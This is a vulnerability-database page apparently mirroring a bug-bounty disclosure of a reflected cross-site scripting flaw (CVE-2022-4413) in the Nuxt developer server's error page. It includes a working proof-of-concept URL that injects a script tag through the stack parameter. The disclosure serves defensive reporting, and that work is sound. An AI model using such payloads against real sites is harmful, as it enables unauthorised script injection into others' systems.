Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrOhb0070AC720D-C932-4ED3-98B1-DD2CBCB90185
HistoryOct 26, 2022 - 7:02 p.m.

Dev Server XSS

2022-10-2619:02:56
ohb00
www.huntr.dev
19
developer server
xss
unsecured
stack trace
rendering
crafted request
nuxt
exploitation
proof of concept
bug bounty

EPSS

0.001

Percentile

30.2%

JSON

Description

The developer server unsafely renders the stack trace within errors. This can be manipulated by sending a specially crafted request.

Root Cause

The error-dev.vuetemplate, within @nuxt\ui-templates uses the v-html directive to render the stacktrace section of the error.

  <h1 />
  <p />
  <div>
    <pre />
  </div>

This would normally not be an issue, however nuxt provides a method for supplying the stacktrace VIA a specially crafted URL.

Exploitation

Navigating to /__nuxt_error?stack=%0A&lt;script&gt;alert("xss!")&lt;/script&gt; will produce XSS.

The first line of stack traces is removed, hence the %0A.

Proof of Concept

https://stackblitz.com/github/nuxt/framework/tree/main/examples/essentials/hello-world?file=app.vue&theme=dark
Navigate to the url /__nuxt_error?stack=%0A&lt;script&gt;alert("xss!")&lt;/script&gt;

Related

veracode 1
cvelist 1
prion 1
cve 1
osv 1
nvd 1
veracode
veracode
Cross-site Scripting (XSS)
2022-12-13 07:43:34
cvelist
cvelist
CVE-2022-4413 Cross-site Scripting (XSS) - Reflected in nuxt/framework
2022-12-11 00:00:00
prion
prion
Cross site scripting
2022-12-12 00:15:00
cve
cve
CVE-2022-4413
2022-12-12 00:15:09
osv
osv
CVE-2022-4413
2022-12-12 00:15:09
nvd
nvd
CVE-2022-4413
2022-12-12 00:15:09

EPSS

0.001

Percentile

30.2%

JSON
Related for 70AC720D-C932-4ED3-98B1-DD2CBCB90185
veracode1cvelist1prion1cve1osv1nvd1